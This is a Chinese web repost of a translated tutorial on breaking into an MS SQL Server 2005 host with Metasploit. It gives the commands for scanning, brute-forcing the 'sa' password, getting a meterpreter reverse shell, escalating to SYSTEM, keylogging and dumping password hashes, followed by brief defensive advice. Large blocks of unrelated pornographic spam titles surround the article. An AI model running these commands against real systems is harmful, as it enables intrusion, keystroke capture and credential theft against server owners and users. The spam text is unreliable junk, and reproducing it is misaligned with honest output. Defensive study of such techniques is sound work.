精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

從攻擊MS SQL Server到獲得系統訪問權限

安全 數據安全
當談及SQL服務器,幾乎所有的系統管理員和數據庫管理員都會同意這樣一個觀點:管理員并不都有設置復雜密碼的意識。看起來這或許方便技術支持人員進行簡單故障排除,但卻過低評估了它的風險性。

當談及SQL服務器,幾乎所有的系統管理員和數據庫管理員都會同意這樣一個觀點:管理員并不都有設置復雜密碼的意識。看起來這或許方便技術支持人員進行簡單故障排除,但卻過低評估了它的風險性。當然這些還不重要,重要的是,它更容易讓攻擊者攻擊系統。

在這次攻擊中,我們將使用到的是Linux Kali和預裝了的Metasploit框架,我們的目標計算機是一臺運行有Microsoft SQL Server 2005的Windows XP系統計算機。當然,同樣的攻擊也可以在任何MS SQL平臺和Windows操作系統下進行,因為在這里系統的弱點是密碼的強度,而不是環境本身。

探測

如同所有的攻擊一樣,首先我們要對目標計算機的系統信息等進行收集。

我們的選擇的是使用nmap工具來掃描某一個IP范圍的SQL的通用端口(1433)。

命令:

NMAP-ST-A-PO 192.168.23.0/24

從攻擊MS SQL Server到獲得系統訪問權限

Metasploit也內置了mssql_ping掃描,可以在一個特定的IP范圍識別任何微軟的SQL服務。

命令:

use auxiliary/scanner/mssql/mssql_ping

set RHOSTS 192.168.23.0/24 (我們目標的IP段)

set THREADS 8

run

現在,我們已經知道我們的目標系統(192.168.23.100),以及Microsoft SQL Server(版本2005 SP4,TCP端口1433)等一些細節,我們可以繼續進行下一個步驟。

攻擊

這次攻擊是基于一個簡單的原理。在大多數情況下,微軟的SQL服務器將被安裝在一個混合模式下。它的默認用戶是“sa”,很多時候對于默認用戶只有一個簡單的密碼。這意味著它會比較容易進行暴力破解得到密碼,使用字典文件。這些字典文件可以從網上下載或自己生成。生成定制字典的好處是,允許手動添加特定的術語和字段,比如在安裝應用程序是可能使用軟相關件名稱或銷售商作為密碼。例如,Sandstone的數據庫密碼就很可能是像“Sandstone01”這樣的字段。

對于攻擊,我們將使用內置的工具MSSQL_Login。指定目標和密碼文件之后,攻擊就開始了。

從攻擊MS SQL Server到獲得系統訪問權限

命令:

use auxiliary/scanner/mssql/mssql_login

Set PASS_FILE /root/passwords.txt (字典文件)

Set RHOSTS 192.168.23.100

Set Threads 8

Set verbose false

run

如果如果這一步攻擊成功就可以獲取到“SA”的密碼。此間價值還用在多說什么,允許數據庫操有木有!但是,在這次攻擊中,我們將使用SA帳戶來訪問底層的Windows操作系統。

開發

現在我們可以用這個SA密碼與我們的目標計算機建立聯系。Kali Linux內置有一個名為mssql_payload的工具。這個工具將允許我們通過端口1433發送我們新的登陸憑據的有效載荷。在這里我們就是基于此攻擊目標與我們之間的會話的。

命令:

use exploit/windows/mssql/mssql_payload

set RHOST 192.168.23.100 (我們的目標)

set password Password01 (我們剛剛獲取的密碼)

use payload/windows/meterpreter/reverse_tcp(our selected payload)

exploit

從攻擊MS SQL Server到獲得系統訪問權限

現在,有趣的事情開始。我們已經打開了目標會話,從這里我們可以進行很多命令了。但要小心,別手抖。當我們將Meterpreter文件安裝到目標計算機的時候,很多病毒防御程序會對其進行檢測、攔截和并刪除處理。從以往的經驗來看,我想說許多SQL服務器管理員都會禁止使用任掃描中任何的訪問形式,從而可以獲得最大的性能由服務器托管數據庫。如果該目標計算機一直在在運行,例如,一個通宵的病毒掃描,它會留給攻擊者充足的時間來進行攻擊和收集系統數據,然后從容離開,深藏功與名。

除了使用的Meterpreter有效載荷,其他的有效載荷也可以使用。這里的執行命令如上述相類,只是改變有效負載名稱的問題而已。比如,有效載荷“generic/shell_bind_tcp”,將在命令提示符下訪問目標系統。

提權

對于很多命令來說,我們需要提升我們用戶的訪問權限。比如使用截取屏幕工具、鍵盤記錄工具和提取密碼哈希值工具等都需要管理員權限來運行。

在這里我們使用了簡單的Meterpreter shell。首先,我們使用ps命令生成一系列進程。然后,我們可以使用migrate命令將一個進程提升至更高系統訪問許可。在這種情況下,這將好比是explorer.exe進程。

現在有我們需要使用一個額外的命令:getsystem。這將使Meterpreter系統的migrate命令得以實現。如果沒有這一點,“權限不足”,進程提升將不能進行。

命令:

Ps(這將顯示正在運行的進程及其相應的PID的)

Getsystem(獲得系統權限)

Migrate 1064(在該例子中的explorer.exePID)

從攻擊MS SQL Server到獲得系統訪問權限

數據收集

現在,我們有了完整的系統訪問權想,我們可以使用一些其他的工具來收集我們所需要的數據。

命令:

Screenshot

在這里將創建目標的截圖,然后以jpeg格式保存。

從攻擊MS SQL Server到獲得系統訪問權限

命令:

Run post/windows/capture/keylog_recorder

這將在目標上運行一個鍵盤記錄工具和將鍵盤記錄重新編碼的保存在系統中的文本文件中。鍵盤記錄可以獲取獲取網頁的登錄信息,銀行帳戶和信用卡信息等。盡管此間有反病毒防御程序,但是,依舊可以輕松地拿到這個鍵盤記錄。

從攻擊MS SQL Server到獲得系統訪問權限

命令:

Migrate 772(Services.exe的PID)

Run post/windows/gather/hashdump

在一個系統中用戶口令通常存儲hash值中,可以通過純碎的暴力破解或是字典、彩虹表等方式進行破解。此處作者為自己之前的一篇相關文章打了廣告——

http://resources.infosecinstitute.com/password-auditing-on-active-directory-databases/

為了獲得目標系統的hash值,我們需要提升services.exe進程,以便能夠獲得足夠的系統的訪問權限。

這些hash值可以用許多暴力破解工具,比如Ophcrack的和Hashcat。

從攻擊MS SQL Server到獲得系統訪問權限

結果

在以上幾個簡單步驟中,我們可以看到我們已經可以通過使用一個開放的SQL Server端口繞過任何防火墻,不僅獲得了完整的數據庫訪問權限,并據此進一步獲得完整的操作系統訪問權限。該鍵盤記錄和提取hash值還可能收集更多有用的網絡的詳細信息,如用戶名和密碼,以及很可能獲得進一步訪問其他系統的信息。

如何抵御這種攻擊

有幾個建議可以保護系統免受這種攻擊。首先,使用“正確”的密碼!不管出于什么原因,一個SQL服務器的SA的密碼,不應該可以不用花多大精力就可以暴力破解的。此外,安裝一個入侵檢測系統或者干脆自動或手動監控日志,這樣可以根據大量的失敗登陸日志檢測出暴力攻擊。另一個方法就是在系統運行一個病毒防御軟件。在這個例子中,有效載荷會在攻擊之前被偵測到并刪除或隔離。

原文地址:http://resources.infosecinstitute.com/attacking-ms-sql-server-gain-system-access/

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2010-07-12 15:49:53

MS SQL Serv

2010-07-08 13:26:02

SQL Server

2009-05-22 16:42:02

MS SQLMySQL轉換

2010-07-09 15:10:11

MS SQL Serv

2011-03-21 10:13:31

Sql Server數分區

2010-06-28 11:22:14

MS SQL Serv

2011-09-01 12:42:09

SQL Server創建加密視圖控制視圖頁面的訪問權限

2023-11-29 09:53:29

數據庫遷移SQL Server

2010-09-27 15:24:11

SQL Server

2010-07-16 10:48:24

MS SQL Serv

2010-06-18 10:50:55

ms SQL Serv

2010-07-12 17:18:24

MS SQL Serv

2022-05-30 11:10:04

數據庫MySQL系統

2011-09-01 12:53:02

SQL Server控制視圖頁面的訪問權限

2010-09-27 14:36:24

SQL Server用

2010-07-26 16:26:56

MS SQL Serv

2022-10-21 08:32:43

2022-07-05 10:50:31

數據庫查詢實戰

2017-06-26 09:15:39

SQL數據庫基礎

2009-07-20 16:40:55

JDBC訪問SQL S
點贊
收藏

51CTO技術棧公眾號

羞羞影院体验区| av在线免费观看不卡| av大片在线播放| 91视频综合网| 岛国成人毛片| 99久久久免费精品国产一区二区| 2019中文字幕在线免费观看| 国产成人免费观看网站| 51精品国产| 欧美日韩一级二级| 国产96在线 | 亚洲| eeuss影院在线观看| 国产91色综合久久免费分享| 国产va免费精品高清在线| 一区二区在线观看免费视频| 亚洲国产欧美日韩在线观看第一区| 欧美日韩精品一区二区| 精品少妇人妻av免费久久洗澡| 欧美jizzhd69巨大| 久久品道一品道久久精品| av成人观看| 一级日韩一级欧美| 丝袜诱惑亚洲看片| 久久久伊人欧美| 四虎884aa成人精品| 精品一区免费| 亚洲国产欧美一区| 国产男女无遮挡猛进猛出| 日本在线精品| 欧美视频不卡中文| 成人免费视频91| 宅男网站在线免费观看| 国产精品成人免费| 日韩电影大全在线观看| 亚州视频一区二区三区| 成人午夜激情片| 亚洲综合色激情五月| 一级片免费观看视频| 日本午夜精品一区二区三区电影| 欧美一级免费视频| 日韩成人高清视频| 99亚洲一区二区| 欧美极品美女电影一区| 九九热精品免费视频| 91成人精品视频| 久久亚洲国产精品成人av秋霞| 69xxx免费| 日韩精品视频在线观看一区二区三区| 日本成人一区二区| 在线观看亚洲专区| 人人爽人人av| 成人黄色毛片| 欧美日本一区二区| 亚洲一二三不卡| 国产精品视频一区二区三区综合 | 国产在视频一区二区三区吞精| 精品欧美一区二区三区| 1024av视频| 自拍视频在线看| 色综合久久久久| 激情综合网俺也去| 久久久久黄色| 91精品国产综合久久福利| 国内av一区二区| 白嫩亚洲一区二区三区| 日韩西西人体444www| 日本中文字幕在线不卡| 9l视频自拍蝌蚪9l视频成人| 亚洲国产欧美久久| 受虐m奴xxx在线观看| 欧美中文字幕一区二区| 伦伦影院午夜日韩欧美限制| 欧美成人黄色网| 亚洲美女一区| 国产成人亚洲综合91| 亚洲一卡二卡在线| 国产成人亚洲综合a∨婷婷 | 中文久久久久久| 亚洲国产aⅴ精品一区二区三区| 欧美精品电影在线播放| 91成人在线观看喷潮蘑菇| 欧美美女黄色| 在线成人一区二区| 欧美精品一区二区蜜桃| 国产欧美91| 国产精品日韩在线观看| av网站在线免费看| 久久一区二区三区四区| 亚洲午夜高清视频| gogo高清在线播放免费| 在线看一区二区| 青娱乐国产精品视频| 中日韩av在线播放| 91高清视频在线观看| 欧美性高潮床叫视频| 亚洲精品性视频| 极品束缚调教一区二区网站| 伊人久久久久久久久久久久久| 欧美交换国产一区内射| 日韩精品一级二级| 不卡日韩av| 1024国产在线| 黑人巨大精品欧美一区二区一视频| 人人干人人干人人| 欧美色图婷婷| 欧美成人黑人xx视频免费观看| 91玉足脚交嫩脚丫在线播放| 国产精品性做久久久久久| 免费成人深夜夜行视频| 亚洲淫性视频| 在线免费视频一区二区| 少妇激情一区二区三区视频| 99久久婷婷这里只有精品| 欧美亚洲国产精品| 国产又粗又猛又爽又黄的| 337p粉嫩大胆噜噜噜噜噜91av | 成人在线高清视频| 亚洲成人动漫精品| 中文字幕一区二区在线观看视频| 国产一区二区三区网| 欧美国产亚洲精品久久久8v| 亚洲一级av毛片| 日本一区二区三区在线观看| av免费观看大全| 亚洲精品影片| 久久久精品亚洲| 亚洲视频一区二区三区四区| 久久一区二区三区四区| 毛片在线播放视频| 国产成人澳门| 色综合久久88| 国产aⅴ爽av久久久久成人| 国产精品国产三级国产aⅴ入口 | 久久婷婷国产综合国色天香| 日韩伦理在线免费观看| 亚洲一区二区三区在线免费| 日韩一区视频在线| 中文字幕观看视频| 欧美经典一区二区三区| 日韩亚洲欧美一区二区| 免费观看性欧美大片无片| 久久这里只有精品视频首页| 一区不卡在线观看| 亚洲欧洲国产日本综合| 不卡的av中文字幕| 五月婷婷激情久久| 久久天天久久| 在线午夜精品自拍| 这里只有精品9| 中文字幕一区不卡| 九九久久久久久| 亚洲精品国产首次亮相| 91九色精品视频| 国产高清一区二区三区视频| 7777精品伊人久久久大香线蕉经典版下载 | 一区视频在线播放| 三区视频在线观看| 一区二区国产在线| 国产福利久久精品| av资源新版天堂在线| 亚洲国产成人av在线| 天天综合网久久综合网| 久久久www免费人成精品| 精品免费国产一区二区| 成人嫩草影院| 成人激情视频在线观看| 在线视频观看国产| 亚洲国产精彩中文乱码av在线播放| 亚洲天堂日韩av| 久久精品视频一区二区| 欧美在线aaa| 国产精品v日韩精品v欧美精品网站 | 亚洲视频免费看| 被黑人猛躁10次高潮视频| 激情综合网址| 日本一区二区高清视频| 91国产一区| 国内成人精品一区| 精品欧美不卡一区二区在线观看| 在线观看91精品国产入口| 小泽玛利亚一区| 成+人+亚洲+综合天堂| 蜜臀久久99精品久久久酒店新书 | 中文字幕亚洲在线观看| 97视频在线看| 一本一道波多野毛片中文在线 | 亚洲第一香蕉网| 九色porny丨国产精品| 免费高清一区二区三区| 欧美日韩播放| 999视频在线免费观看| 自拍在线观看| 久久成人国产精品| 飘雪影院手机免费高清版在线观看 | 国产精品入口久久| 91嫩草在线| 丝袜美腿一区| 欧美日韩国产成人在线观看| av中文字幕在线| 精品国产一区二区三区av性色| 中文字幕国产在线观看| 亚洲狼人国产精品| 天天插天天射天天干| 久久www免费人成看片高清| 久激情内射婷内射蜜桃| 久久久久久美女精品| 欧美精品在线一区| 99久久香蕉| 91久热免费在线视频| 成人日韩精品| 91精品国产91久久| 污片在线免费观看| 国产亚洲综合久久| 天天综合网在线观看| 欧美一区二区三区系列电影| 无码人妻精品一区二区三区蜜桃91| 亚洲三级久久久| 中文字幕伦理片| 91首页免费视频| 女同性αv亚洲女同志| 久久国产剧场电影| 可以免费观看av毛片| 亚洲无线视频| 奇米777四色影视在线看| 日韩欧美午夜| 日本在线成人一区二区| 日韩精选在线| 极品日韩久久| 国产亚洲成av人片在线观黄桃| 亚洲一区二区少妇| 亚洲在线资源| 国产在线视频欧美| 欧美美女福利视频| 国产精品三级久久久久久电影| 水蜜桃av无码| 另类图片综合电影| 久久久久久久久久国产| 1024在线播放| 久久精品视频在线| 免费av不卡| 久久精品色欧美aⅴ一区二区| 98在线视频| 日韩最新中文字幕电影免费看| 成人精品一区二区三区校园激情| 亚洲丝袜av一区| 你懂的好爽在线观看| 亚洲精品自拍偷拍| 看电影就来5566av视频在线播放| 日韩精品一二三四区| 四虎影视精品成人| 亚洲欧美另类中文字幕| 国产一区精品| 中文字幕亚洲综合久久筱田步美| 精品成人一区二区三区免费视频| 亚洲天堂色网站| melody高清在线观看| 中文字幕在线亚洲| a级在线观看| 久久成人免费视频| sqte在线播放| 国产91精品最新在线播放| 高清成人在线| 亚洲va久久久噜噜噜| 9国产精品午夜| 久久影院理伦片| 成人综合专区| 黄色一级片网址| 精品白丝av| 亚洲中文字幕无码不卡电影| 日韩1区2区日韩1区2区| 中文字幕日韩久久| 成人免费观看av| 久久精品成人av| 亚洲视频在线一区| 久久久久久久久久久久久久免费看 | 国产精品嫩模av在线| 一区高清视频| 黄色亚洲免费| 色婷婷综合久久久久中文字幕| 九九国产精品视频| 精品1卡二卡三卡四卡老狼| 久久综合久久99| 日韩成人短视频| 欧美日韩性生活视频| japanese国产在线观看| 欧美一级在线免费| 玖玖综合伊人| 欧美精品免费看| 国产日韩电影| 91在线精品播放| 九九久久成人| 无码毛片aaa在线| 久久狠狠婷婷| 久草福利在线观看| 国产日本欧美一区二区| 久久久久久久极品内射| 欧美视频一区二| 色一情一乱一区二区三区| 色悠悠久久88| 天堂av在线网| 99在线视频首页| 欧美美女一区| 欧美 丝袜 自拍 制服 另类| 国产一区二区三区av电影| 中文字幕免费看| 亚洲午夜在线视频| 91精品视频免费在线观看| 精品在线观看国产| 黄在线免费看| 国产成+人+综合+亚洲欧洲| 麻豆国产一区二区三区四区| 青青草成人网| 激情丁香综合| 亚洲热在线视频| 欧美激情综合在线| 成人午夜淫片100集| 日韩欧美在线不卡| 日本精品一区二区三区在线播放| 欧美最猛性xxxx| 91精品短视频| 日韩不卡视频一区二区| 久久99精品久久久久婷婷| a资源在线观看| 色乱码一区二区三区88| 日本一本草久在线中文| 国模极品一区二区三区| 亚洲一区电影| 大陆极品少妇内射aaaaaa| 久久成人免费电影| 国产精品免费无码| 色狠狠综合天天综合综合| 午夜福利理论片在线观看| 久久久久久久久综合| 日韩精品久久久久久久软件91| 自拍另类欧美| 激情五月激情综合网| 乱老熟女一区二区三区| 欧美日韩在线观看一区二区| 国产香蕉视频在线看| 日韩av手机在线看| 久草精品在线| 手机看片福利日韩| 欧美国产日产图区| 国产女优在线播放| 中文字幕国产亚洲| 日本久久久久| 天堂v在线视频| 国产精品自在在线| 激情视频在线播放| 精品精品国产高清一毛片一天堂| 青草在线视频在线观看| 97人人模人人爽人人少妇| 午夜精品剧场| 成人啪啪18免费游戏链接| 亚洲国产精品视频| 天天综合在线视频| 国产成人综合久久| 日韩a一区二区| 国产一区二区在线观看免费视频| 中文字幕欧美一| 黄色一级大片在线免费看国产| 午夜精品久久久久久久99热浪潮 | 日韩精品在线观看网站| 中文字幕在线高清| 午夜精品福利一区二区| 久久99国内精品| 久久综合成人网| 日韩激情在线视频| 黄色精品视频| 欧美一区二区三区综合| av毛片久久久久**hd| 日韩av免费播放| 久久久国产一区| 精品国内亚洲2022精品成人| 免费午夜视频在线观看| 中文字幕一区二区5566日韩| 蜜桃av鲁一鲁一鲁一鲁俄罗斯的| 欧美壮男野外gaytube| 999国产精品视频| 日本黄色免费观看| 欧美在线播放高清精品| 91三级在线| 欧美性大战久久久久| 韩国欧美国产一区| 成人免费区一区二区三区| 中文字幕亚洲天堂| 91久久精品无嫩草影院| 日日碰狠狠躁久久躁婷婷| 亚洲蜜臀av乱码久久精品蜜桃| 无码国产伦一区二区三区视频| 国产精品一区久久| 国产欧美69| 麻豆亚洲av成人无码久久精品| 亚洲一级免费视频| 综合激情网...| 久久国产精品国产精品| 天天色 色综合| 国产黄色在线网站| 日韩精品av一区二区三区| 国产成人av资源|